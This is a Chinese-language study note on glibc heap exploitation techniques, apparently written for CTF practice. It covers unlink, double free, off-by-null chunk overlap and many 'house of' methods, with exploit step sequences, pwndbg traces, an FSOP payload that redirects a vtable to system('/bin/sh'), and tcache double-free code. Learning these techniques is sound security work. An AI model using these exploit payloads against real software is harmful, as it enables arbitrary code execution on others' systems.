FD->bk_nextsize = P->bk_nextsize; \
P->fd_nextsize->bk_nextsize = FD; \
P->bk_nextsize->fd_nextsize = FD; \
} \
} else { \
// 如果在的话,直接拿走即可
P->fd_nextsize->bk_nextsize = P->bk_nextsize; \
P->bk_nextsize->fd_nextsize = P->fd_nextsize; \
} \
} \
} \
}

attack

UAF

  • 漏洞:free(*ptr)后没有ptr=NULL
    free(chunk)
    edit(chunk->fd = target_addr)
    target[0] = 0
    target[1] = fake_size
    malloc(chunk)
    malloc(target)

double free

  • 漏洞:UAF
  • 可利用:fastbintcache
    #这里free(chunk1)是指释放chunk1,只是为了方便表达
    free(chunk1)
    free(chunk2)
    free(chunk1)

    malloc(chunk1)
    edit(chunk1->fd = target_addr)
    malloc(chunk2)
    malloc(chunk1)
    malloc(chunk3)(malloc(target),这样就实现了任意地址写)
  • 漏洞:off by ... 、堆溢出
  • **可利用:unsortedbin
    malloc(chunk1)
    malloc(chunk2)
    edit(chunk1->fd = 0)
    edit(chunk1->bk = chunk_size-0x10)
    edit(chunk1->bk+0x8 = chunk1_ptr_addr-0x18)
    edit(chunk1->bk+0x10 = chunk1_ptr_addr-0x10)
    edit(chunk2->prev_size = chunk_size-0x11)
    edit(chunk2->size = chunk_size-0x1)
    free(chunk2)

    #pre_chunk1->bk+0x8 = chunk1->bk+0x10 = main_arena+...
    #chunk1->chunk1_ptr_addr-0x18
    edit(chunk1_ptr_addr = got) #leak libc
    ...

Off by …

heap overlap

#chunk1,chunk2,chunk3 all allocated
#chunk1 | chunk2 | chunk3
#off by one -> chunk1
edit(chunk2->size = chunk2_size+chunk3_size+1)
free(chunk2)
malloc(chunk2+chunk3)
#任意写chunk3
#chunk2 free ; chunk3 allocated
#chunk1 | chunk2 | chunk3
#off by one -> chunk1
edit(chunk2->size = chunk2_size+chunk3_size+1)
free(chunk2)
malloc(chunk2+chunk3)
#任意写chunk3
#chunk1,chunk2,chunk3 all allocated
#chunk1 | chunk2 | chunk3
#chunk3->size%0x100 = 0
free(chunk1)
#off by null -> chunk2 ; chunk3->prev_inuse = 0
edit(chunk3->prev_size = chunk1_size+chunk2_size)
free(chunk3)
malloc(chunk1+chunk2+chunk3)
#任意写chunk2
#chunk0,chunk1,chunk2,chunk3 all allocated
#chunk0 | chunk1 | chunk2 | chunk3
free(chunk0) #在 chunk1 的 prev_size 域留下 chunk0 的大小
#off by null -> chunk1 ; chunk2->prev_inuse = 0
edit(chunk2->prev_size = chunk0_size+chunk1_size)
...
  1. 现在有 Chunk_0、Chunk_1、Chunk_2、Chunk_3。
  2. 释放 Chunk_0 ,此时将会在 Chunk_1 的 prev_size 域留下 Chunk_0 的大小
  3. 在 Chunk_1 处触发Off-by-null,篡改 Chunk_2 的 prev_size 域以及 prev_inuse位
  4. Glibc 通过 Chunk_2 的 prev_size 域找到空闲的 Chunk_0
  5. 将 Chunk_0 进行 Unlink 操作,通过 Chunk_0 的 size 域找到 nextchunk 就是 Chunk_1 ,检查 Chunk_0 的 size 与 Chunk_1 的 prev_size 是否相等。
  6. 由于第二步中已经在 Chunk_1 的 prev_size 域留下了 Chunk_0 的大小,因此,检查通过。

2.29

新增的保护

if (chunksize (p) != prev_size (next_chunk (p)))
malloc_printerr ("corrupted size vs. prev_size");

新的构造绕过

add(0,0x418,b'a')
add(1,0x108,b'a')
add(2,0x438,b'a')
add(3,0x438,b'a')
add(4,0x108,b'a')
add(5,0x488,b'a')
add(6,0x428,b'a')
add(7,0x108,b'a')

delete(0)
delete(3)
delete(6)
delete(2)

add(2,0x458,b'\x00'*0x438+b'\x51\x05')
add(3,0x418,b'a')
add(0,0x418,b'0'*0x100)
add(6,0x428,b'a')

delete(0)
delete(3)
add(0,0x418,b'\x00'*8)

delete(6)
delete(5)
add(5,0x4f8,b'\x00'*0x488+p64(0x431))
add(6,0x3b8,b'a')
add(3,0x418,b'a')

delete(4)
add(4,0x108,b'\x00'*0x100+p64(0x550))

delete(5)

下面演示一下,执行到delete(6)

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f7c00
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x440 Used None None
0x61107b3f7c00 0x0 0x440 Freed 0x61107b3f7290 0x61107b3f85e0
0x61107b3f8040 0x440 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7c00 0x73ccc601ace0
0x61107b3f8a10 0x430 0x110 Used None None
delete(2)造成合并

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f85e0
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x880 Freed 0x61107b3f85e0 0x73ccc601ace0
0x61107b3f8040 0x880 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7290 0x61107b3f77c0
0x61107b3f8a10 0x430 0x110 Used None None

将原来的2号扩展0x20,将原来三号的头保护起来,成为新的2号,而原来的3号缩小了0x20

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601b0d0 0x61107b3f85e0
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601ace0 0x73ccc601ace0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7290 0x73ccc601b0d0
0x61107b3f8a10 0x430 0x110 Used None None

保护的fd、bk指向0号和6号,另外把chunk的大小改为chunk3_size+chunk4_size

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0

接着可以把其他的堆块全申请回来,这里原来的3号prev_size地址一定是以\x00结尾,这样我们就可以利用off-by-null让他从指向新的3号到指向旧的3号

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Used None None
0x61107b3f8a10 0x430 0x110 Used None None

接着我们构造0号bk指针指向原来的3号地址

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f7c20
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x61107b3f7290 0x73ccc601ace0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Used None None
0x61107b3f8a10 0x430 0x110 Used None None

off-by-null

pwndbg> tele 0x61107b3f7290
00:0000│ 0x61107b3f7290 ◂— 0
01:0008│ 0x61107b3f7298 ◂— 0x421
02:0010│ 0x61107b3f72a0 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
03:0018│ 0x61107b3f72a8 —▸ 0x61107b3f7c20 ◂— 0
04:0020│ 0x61107b3f72b0 ◂— 0
05:0028│ 0x61107b3f72b8 ◂— 0

off-by-null

00:0000│     0x61107b3f7290 ◂— 0
01:0008│ 0x61107b3f7298 ◂— 0x421
02:0010│ r9 0x61107b3f72a0 ◂— 0
03:0018│ 0x61107b3f72a8 —▸ 0x61107b3f7c00 ◂— 0
04:0020│ 0x61107b3f72b0 ◂— 0
05:0028│ 0x61107b3f72b8 ◂— 0

bk指向了原来的3

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0

接着修改6号的fd指向原来的3号

先free掉块合并

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f8150
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x8c0 Freed 0x61107b3f7c20 0x73ccc601ace0
0x61107b3f8a10 0x8c0 0x110 Used None None

off-by-null

pwndbg> tele 0x61107b3f8150+0x490
00:0000│ 0x61107b3f85e0 ◂— 0
01:0008│ 0x61107b3f85e8 ◂— 0x431
02:0010│ 0x61107b3f85f0 —▸ 0x61107b3f7c20 ◂— 0
03:0018│ 0x61107b3f85f8 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f8600 ◂— 0
... ↓ 3 skipped

off-by-null

pwndbg> tele 0x61107b3f8150+0x490
00:0000│ 0x61107b3f85e0 ◂— 0
01:0008│ 0x61107b3f85e8 ◂— 0x431
02:0010│ 0x61107b3f85f0 —▸ 0x61107b3f7c00 ◂— 0
03:0018│ 0x61107b3f85f8 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f8600 ◂— 0
... ↓ 3 skipped

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601b0d0 0x73ccc601b0d0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Freed 0x73ccc601ace0 0x73ccc601ace0
0x61107b3f8a10 0x3c0 0x110 Used None None

fd成功指向旧的3号,这样我们就已经构造完了

pwndbg> x/6gx 0x61107b3f7290
0x61107b3f7290: 0x0000000000000000 0x0000000000000421
0x61107b3f72a0: 0x0000000000000000 0x000061107b3f7c00
0x61107b3f72b0: 0x0000000000000000 0x0000000000000000
pwndbg> x/6gx 0x61107b3f7c00
0x61107b3f7c00: 0x0000000000000000 0x0000000000000551
0x61107b3f7c10: 0x000061107b3f7290 0x000061107b3f85e0
0x61107b3f7c20: 0x0000000000000000 0x0000000000000421
pwndbg> x/6gx 0x61107b3f85e0
0x61107b3f85e0: 0x0000000000000000 0x0000000000000431
0x61107b3f85f0: 0x000061107b3f7c00 0x000073ccc601ace0
0x61107b3f8600: 0x0000000000000000 0x0000000000000000

接着让4可以实现UAFoff-by-null修改5号的prev_inuse,并且使prev_size改为3号和4号的大小和,再free掉5,这样旧的3号、4号、5号就会合并成一个大free块,但是4号还可以使用

off-by-null

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Used None None
0x61107b3f8a10 0x3c0 0x110 Used None None

off-by-null

pwndbg> tele 0x61107b3f8150
00:0000│ 0x61107b3f8150 ◂— 0x550
01:0008│ 0x61107b3f8158 ◂— 0x500
02:0010│ 0x61107b3f8160 ◂— 0
... ↓ 5 skipped

堆状态

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Freed 0x0 0x0
0x61107b3f8150 0x550 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Used None None
0x61107b3f8a10 0x3c0 0x110 Used None None

最后一步,把5号delete,由于prev_inuse为0,所以找prev_size定位到原来的3号头,通过fd、bk指针找到0号和6号,而0号的bk指向原来的3号,6号的fd指向原来的3号,而新增的检查

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc6010061 ◂— 0xd00e4201c80ef002
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601b0d0 (main_arena+1104) —▸ 0x73ccc601b0c0 (main_arena+1088) —▸ 0x73ccc601b0b0 (main_arena+1072) —▸ 0x73ccc601b0a0 (main_arena+1056) ◂— ...
pwndbg> tele 0x61107b3f7c00+0x550
00:0000│ 0x61107b3f8150 ◂— 0x550
01:0008│ 0x61107b3f8158 ◂— 0x500
02:0010│ 0x61107b3f8160 ◂— 0

满足,于是delete5号合并

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Freed 0x0 0x0
Corrupt ?! (size == 0) (0x61107b3f7c20)
pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0xa51 /* 'Q\n' */
02:0010│ 0x61107b3f7c10 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc6010061 ◂— 0xd00e4201c80ef002
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601b0d0 (main_arena+1104) —▸ 0x73ccc601b0c0 (main_arena+1088) —▸ 0x73ccc601b0b0 (main_arena+1072) —▸ 0x73ccc601b0a0 (main_arena+1056) ◂— ...
pwndbg> bins
tcachebins
empty
fastbins
empty
unsortedbin
all: 0x61107b3f7c00 —▸ 0x73ccc601ace0 (main_arena+96) ◂— 0x61107b3f7c00
smallbins
empty
largebins
empty

unsortedbin attack

decrypt_safe_linking

free函数为例子,在2.32glibc中在释放chunk时不是直接把fd值放入p->fd中。而是经过PROTECT_PTRREVEAL_PTR处理。PROTECT_PTR和 REVEAL_PTR在宏定义中定义:

/* Safe-Linking:  
Use randomness from ASLR (mmap_base) to protect single-linked lists
of Fast-Bins and TCache. That is, mask the "next" pointers of the
lists' chunks, and also perform allocation alignment checks on them.
This mechanism reduces the risk of pointer hijacking, as was done with
Safe-Unlinking in the double-linked lists of Small-Bins.
It assumes a minimum page size of 4096 bytes (12 bits). Systems with
larger pages provide less entropy, although the pointer mangling
still works. */
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)

  • 效果:类似unsortedbin attack在任意地址写入一个libc地址,任意地址分配
  • 版本:带tcache的版本
  • 原理:如果我们需要的chunk位于了smallbin里面,当我们将chunksmallbin拿出来的时候,还会去检查当前smallbin链上是否还有剩余堆块,如果有的话并且tcachebin的链上还有空余位置并且tcache bin不能为空,就会将剩余的那个堆块给链入到tcachebin中。而将small bin中的堆块链入到tcache bin中的时候没有进行双向链表完整性的检查,此时攻击那个即将链入tcachebin的堆块的bk指针,即可向任意地址写入一个libc地址
  • 前提:
    • calloc分配堆块
    • 可以控制smallbin中的bk指针
    • smallbin中最少要有两个堆块
  • 攻击步骤(方式1)
    • 先进行堆地址的泄露
    • 然后将tcachebin中只留6个堆块,这样smallbin链入tcachebin后,tcachebin就会直接装满,防止程序继续通过我们篡改的bk指针继续往下遍历
    • 再做出至少两个位于smallbin中的chunk(可以通过切割unsorted bin的方式,让剩余部分的堆块进入small bin或者当遍历unsorted bin的时候,会给堆块分类,让其小堆块进入small bin中)
    • 利用溢出或UAF+edit等手段,篡改位于smallbin中的链表头堆块的bk指针为target_addr-0x10
    • 注意伪造bk的时候一定不能破坏fd指针
    • 最后我们申请一个位于smallbin那条链对应size中的chunk,将smallbin中的链表尾堆块申请出来,而smallbin链中的链表头堆块则进入tcachebin,在链入tcachebin的期间触发了tcache stashing unlink attack
  • 攻击步骤(方式2)
    • 先进行堆地址的泄露
    • 然后将tcachebin中只留5个堆块
    • 再做出至少两个位于smallbin中的chunk
    • 利用溢出或UAF+edit等手段,篡改位于smallbin中的链表头堆块的bk指针为我们想要申请的地址附近fake_chunk_addr-0x10,再修改fake_chunk_bk=target_addr-0x10
    • 注意伪造bk的时候一定不能破坏fd指针
    • 最后我们申请一个位于smallbin那条链对应size中的chunk,在链入tcachebin的期间触发了tcache stashing unlink attack,得到了一个堆块的分配和一个任意地址写libc

largebin attack

tcache poisoning

修改放入tcachebinattack chunkfd指针指向想要控制的地址,申请与attack chunk大小相同的chunk即可申请到想要的地址 高版本使用了异或加密,所以我们写入的也要加密

house of spirit

  • 版本:2.23~
  • 目的:获得某块内存的任意写
  • 利用方式:在某块内存伪造chunk,将本来不是chunk的这块内存被freebins里,再次malloc后就实现了任意写
  • 伪造结构:
    • fake_chunk
      • prev_size无要求
      • size
        • N->0
        • M->0
        • P->0
        • prev_size的最低位地址满足16字节对齐(64位)
        • size<0x80
        • size满足16字节对齐(64位)
      • fd、bk、data无要求
    • next_chunk
      • prev_size无要求
      • size<128KB
      • size满足16字节对齐(64位)
  • 利用前提
    • 能通过溢出控制要free的地址
  • 注意事项
    • 注意题目中的计数器
    • 如果有多个地方可以伪造,注意伪造到哪个地方对后续有用。
    • 注意伪造堆块的size位和next_size位。
    • 还要注意程序逻辑,如果当程序释放完fake_chunk后还要再继续释放,可能就会出现问题,这时就要在fake_chunk中写入适当的数据,绕过程序逻辑

house of Einherjar

  • 版本:2.23~
  • 目的:获得某块内存的任意写
  • 利用方式:在某块内存伪造chunk,利用off-by-one使堆块后向合并,将指针更新为指向fake chunk,再次malloc后就实现了在fake chunk任意写
  • 伪造结构:
    • fake_chunk
      • prev_size = chunk1_size
      • size
        • N->0
        • M->0
        • P->0
        • prev_size的最低位地址满足16字节对齐(64位)
        • size = chunk1_size
      • fd、bk、fd_nextsize、bk_nextsize = fake_chunk_prev_size_addr
    • chunk0
    • chunk1
      • prev_size = chunk1_addr-fake_chunk_addr
      • N->0
      • M->0
      • P->0
      • size0x100整数倍(size=0也被允许)
  • 利用前提
    • off-by-one、off-by-null
    • 能获得堆地址和fake chunk地址

house of force

  • 版本:2.23~2.29
  • 目的:获得某块内存的任意写
  • 利用方式:修改top chunksize极大,申请一个可能极大的堆(从堆地址一直到要修改的地址),将top chunk指针更新为指向target,再次malloc后就实现了在target任意写
  • 攻击方式:
    • 通过溢出修改top chunksize位为-1
    • 申请一个特定大小的堆(可以是负数)
      • req=dest - old_top_prev_size_addr - 4*sizeof(long)
    • 再次申请即可实现某块特定内存的任意写
  • 利用前提
    • 堆溢出修改top chunksize
    • 能获得堆地址和目的地址

house of lore

  • 版本:2.23~2.31

  • 目的:获得某块内存的任意写

  • 利用方式:在某块内存伪造chunk和辅助chunk,利用UAF修改smallbinbk指针,使fake_chunk链入smallbinmalloc smallbin后再次malloc后就实现了在fake chunk任意写

  • 伪造结构:

    • fake_chunk_1
      • fd = small_chunk_1_prev_size_addr
      • bk = fake_chunk_2_prev_size_addr
    • fake_chunk2
      • fd = fake_chunk_1_prev_size_addr
  • 具体实现:

    • 申请一个smallbin范围堆块(victim),伪造fake_chunk_1fake_chunk_2
    • 释放victim,申请一个更大的堆块,再修改victim->bkfake_chunk_1_prev_size_addr
    • 再申请一个与victim同样大小的堆,将fake_chunk链入smallbin,触发(smallbin->bk = victim->bk=stack_buffer1_addr)
    • 再申请一个与victim同样大小的堆,即可得到fake_chunk_1
  • 利用前提

    • UAF
    • 能获得堆地址甚至需要其他地址
  • Step 1

  • Step 2

  • Step 3

  • Step 4

house of orange

  • 版本:2.23~2.26
  • 效果:任意函数/命令执行
  • 特点:无free
  • 利用过程:
    • 先利用溢出等方式进行篡改top chunksize
    • 然后申请一个大于top chunksize
    • 实现了将堆块放入unsortedbin
  • 伪造结构:
    • nb表示申请堆块大小
    • MINSIZE<old_top_size<nb+MINSIZE
    • old_top_sizeprev_size位是1
    • (old_top_size+old_top)&0xfff=0x000
    • nb<0x20000
  • unsortedbin attack
    • 往一个指定地址里写入一个很大的数(main_arena+88或main_arena+96)
    • 实现:
      • unsortedbin的尾部chunkbk指针写入target_addr-0x10
    • 完成了unsortedbin attack后将无法从unsortedbin中获得堆块了
  • FSOP
    • 原理:
      • 篡改_IO_list_all_chain,来劫持IO_FILE结构体,让IO_FILE结构体落在我们可控的内存上,然后在FSOP中我们使用_IO_flush_all_lockp来刷新_IO_list_all链表上的所有文件流,也就是对每个流都执行一下fflush,而fflush最终调用了vtable中的_IO_overflow
      • 而前面提到了,我们将IO_FILE结构体落在我们可控的内存上,这就意味着我们是可以控制vtable的,我们将vtable中的_IO_overflow函数地址改成system地址即可,而这个函数的第一个参数就是IO_FILE结构体的地址,因此我们让IO_FILE结构体中的flags成员为/bin/sh字符串,那么当执行exit函数或者libc执行abort流程时或者程序从main函数返回时触发了_IO_flush_all_lockp即可拿到shell
    • 布局
      • 篡改_IO_list_allmain_arena+88这个地址,chain字段是首地址加上0x68偏移得到的,因此chain字段决定了下一个IO_FILE结构体的地址为main_arena+88+0x68,这个地址恰好是smallbinsize0x60的数组
      • 将一个chunk放到这个smallbinsize0x60的链上,那么篡改_IO_list_allmain_arena+88这个地址后,smallbin中的chunk就是IO_FILE结构体了,
      • 将其申请出来后可以控制这块内存从而伪造vtable字段进行布局最终拿到shell
    • 检查绕过
      • mode=0
      • _IO_write_ptr=1
      • _IO_write_base=0
      • _flag=/bin/sh
    • 成功概率只有50%
    • glibc-2.24后加入vtablecheck,但可以利用IO_str_jumps结构利用
    • unsortedbin attackFSOP攻击都是构造数据在一个payload里的
payload=b'f'*0x400
payload+=p64(0)+p64(0x21)
payload+=p64(sys_addr)+p64(0)
payload+=b'/bin/sh\x00'+p64(0x61) #old top chunk prev_size & size 同时也是fake file的_flags字段
payload+=p64(0)+p64(io_list_all-0x10) #old top chunk fd & bk
payload+=p64(0)+p64(1)#_IO_write_base & _IO_write_ptr
payload+=p64(0)*7
payload+=p64(leak_heap+0x430)#chain->old top chunk addr
payload+=p64(0)*13
payload+=p64(leak_heap+0x508)#vtable
payload+=p64(0)+p64(0)+p64(sys_addr)#DUMMY finish overflow

     if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
result = EOF;

house of rabbit

  • 版本:2.23~2.31
  • 目的:获得某块内存的任意写
  • 核心:利用 fastbin consolidate 使 fastbin 中的 fake chunk 合法化
  • 利用方式:
    • 修改fd
      • 申请 chunk A (fastbin)chunk B (smallbin)
      • 释放 chunk A,修改 A->fd 指向地址 X
      • free chunk B使fake chunk 被放到了 unsortedbin
      • 分配足够大的 chunk等能触发 malloc_consolidate 使fake chunk 进入到对应的 smallbin/largebin
      • 取出 fake chunk 进行读写即可
    • 堆叠
  • 利用前提
    • UAF
    • fastbinfdsize域可写
    • 超过0x400大小的堆分配

house of roman

  • 版本:2.23~2.29
  • 目的:getshell
  • 利用方式:
    • Step 1
      • 构造chunk
        • chunk_0size=0x70
          • fastbin_victim
          • UAF
        • chunk_1size=0x90
          • 使chunk_2页对齐
        • chunk_2size=0x90
          • main_arena_use
          • unsortedbin
        • chunk_3size=0x70
          • relative_offset_heap
          • 写相对地址
      • free(chunk_2)
      • malloc(0x60)
        • chunk_2->chunk_2_1(0x70,fake_libc_chunk)+chunk_2_2(0x20,leftover_main,unsortedbin)
      • free(chunk_3)+free(chunk_0),都在fastbin
      • edit(chunk_0->fd=fake_libc_chunk_prev_size_addr)
      • edit(fake_libc_chunk->fd=__malloc_hook-0x23)
        • 爆破
      • malloc(0x60)*3
    • Step 2
      • malloc(chunk_4,size=0x90)+malloc(0x30)
      • free(chunk_4)
      • edit(chunk_4->bk=__malloc_hook-0x10)
      • malloc(malloc_hook_chunk,size=0x90)
      • edit(malloc_hook_chunk->fd=ogg_addr)
  • 利用前提
    • UAF
    • 不需要泄露地址
    • 爆破16位,1/40960

house of storm

  • 版本:2.23~2.29
  • 目的:任意地址写
  • 伪造结构
    • unsorted_bin->fd = 0
    • unsorted_bin->bk = fake_chunk
    • large_bin->fd = 0
    • large_bin->bk = fake_chunk+8
    • large_bin->fd_nextsize = 0
    • large_bin->bk_nextsize = fake_chunk - 0x18 -5
  • 利用方式:
    • chunk_1size=0x410
    • chunk_2size=0x30
    • chunk_3size=0x420
    • chunk_4size=0x30
    • chunk_5size=0x30
    • chunk_6size=0x30
    • free(chunk_1)+free(chunk_3)+free(chunk_5)
    • malloc(chunk_5)
    • malloc(chunk_3)+free(chunk_3)
    • edit(chunk_3->bk=__malloc_hook-0x50)
    • edit(chunk_1->bk=__malloc_hook-0x50+8)
    • edit(chunk_1->bk_nextsize=__malloc_hook-0x50-0x18-5)
    • malloc(0x48)(__malloc_hook_chunk)
    • edit(__malloc_hook_chunk+0x40=ogg_addr)
    • malloc->getshell
  • 利用前提
    • UAF
    • unsortedbin attacklargebin attack

house of corrosion

  • 版本:2.23~
  • 目的:任意地址读写,任意地址值转移
  • 伪造结构
    • chunk size = (target_addr - &main_arena.fastbinsY) x 2 + 0x20
  • 利用方式:
    • target_addrtarget_message
      • 释放fastbin Atarget_addr使A->fd指向target_message
    • target_messagetarget_addr
      • malloc(A,size=chunk size)
      • unsortedbin attack change global_max_fast
      • free(A)
      • 使A->fdtarget_message
      • malloc(A)
    • 转移attack_addrtarget_messagetarget_addr地址上
      • src_size=(attack_addr-fastbinY)*2+0x20
      • dst_size=(target_addr-fastbinY)*2+0x20
      • malloc(A,size=dst_size)
      • malloc(B,size=dst_size)
      • free(B)
      • free(A)
      • unsortedbin attack change global_max_fast
      • 使attack_addrfd指向的堆A的fd指向自己
      • malloc(A)edit(A->size=src_size)free(A)
      • 此时A落入target_addrfd指针值变成target_message
      • edit(A->size=dst_size),落入target_messagemalloc(A)
  • 利用前提
    • UAF、堆溢出
    • 不需要泄露地址,爆破1/16
    • 任意大小分配
    • 可以修改global_max_fast

house of husk

  • 版本:2.23~2.35
  • 目的:backdoor or getshell
  • 伪造结构
    • __printf_function_table!=NULL
    • __printf_arginfo_table=control_addr
    • __printf_arginfo_table[spec]=backdoor_addr
  • 执行顺序:
    • printf->vprintf->(if __printf_function_table!=NULL)printf_positional->__parse_one_specmb->(*__printf_arginfo_table[spec->info.spec])
  • 利用方式:
    • unsortedbin leak libcunsortedbin attack global_max_fast
  • 利用前提
    • UAF、堆溢出
    • 任意大小分配
    • 可以修改global_max_fast
  • printf:
    • __vfprintf_internal
      • buffered_vfprintf
    • printf_positional
      • __parse_one_specmb
        • (*__printf_arginfo_table[spec->info.spec])

house of mind

house of muney

house of rusk

house of crust

house of io

house of botcake

通过第一次freeunsorted bin,第二次freetcache bin构造chunk overlap,实现tcache中的double free,从而轻易实现tcache poisoning以进行后续攻击

以适当的大小(大于最大fastbin,小于等于最大Tcache)先malloc 7chunk用于填充tcache,再分别malloc一个合并堆块prev,一个与前面7个相同大小的被攻击堆块victim,然后malloc一个任意大小chunk用于和top chunk分隔

void* chunks[7];  
for(int i=0; i<7; i++){
chunks[i]=malloc(0x80);
}
void* prev=malloc(0x80);
void* victim=malloc(0x80);
malloc(0x10);

free掉前7个chunk,填满tcache;然后按顺序freevictimprev,触发prevvictim的合并

for(int i=0; i<7; i++){  
free(chunks[i]);
}
free(victim);
free(prev);

malloc一个相同大小的chunk,使Tcache bin腾出一个位置

malloc(0x80);

再次free victim,此时victim进入Tcache,实现double free

free(victim);

